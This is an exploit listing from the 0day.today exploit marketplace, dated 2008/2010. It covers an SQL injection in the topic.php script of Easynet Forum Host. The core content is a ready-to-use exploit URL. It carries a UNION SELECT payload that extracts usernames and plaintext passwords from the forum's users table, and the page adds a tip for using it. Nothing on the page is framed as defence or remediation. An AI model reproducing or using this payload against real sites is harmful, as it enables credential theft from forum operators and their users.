[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Easynet Forum Host (topic.php) SQL Injection Vulnerbility

Author
Yakir Wizman
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11276
Category
web applications
Date add
12-03-2010
Platform
unsorted
=========================================================
Easynet Forum Host (topic.php) SQL Injection Vulnerbility 
=========================================================

# Exploit Title: Easynet Forum Host (topic.php) SQL Injection Vulnerbility
# Date: 05/04/2008
# Author: Pr0T3cT10n
# Software Link: http://www.easynet4u.com/forum
# Version: all
# Tested on: all
# CVE:
# Code:
//------------------------------------------------
// Easynet Forum Host SQL Injection Vulnerbility
//------------------------------------------------
// Discovered by: Pr0T3cT10n, 
// Discovered on: 5 April 2008
// SCRIPT DOWNLOAD: N/A
//------------------------------------------------
// SCRIPT SITE: http://www.easynet4u.com/forum
//------------------------------------------------
// Description: retrive users username and plaintext password.
//------------------------------------------------
// NOTE / TIP: After you exploit the site please press CTRL+A :)
// EXPLOIT: http://www.server.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0
//------------------------------------------------



#  0day.today [2024-12-25]  #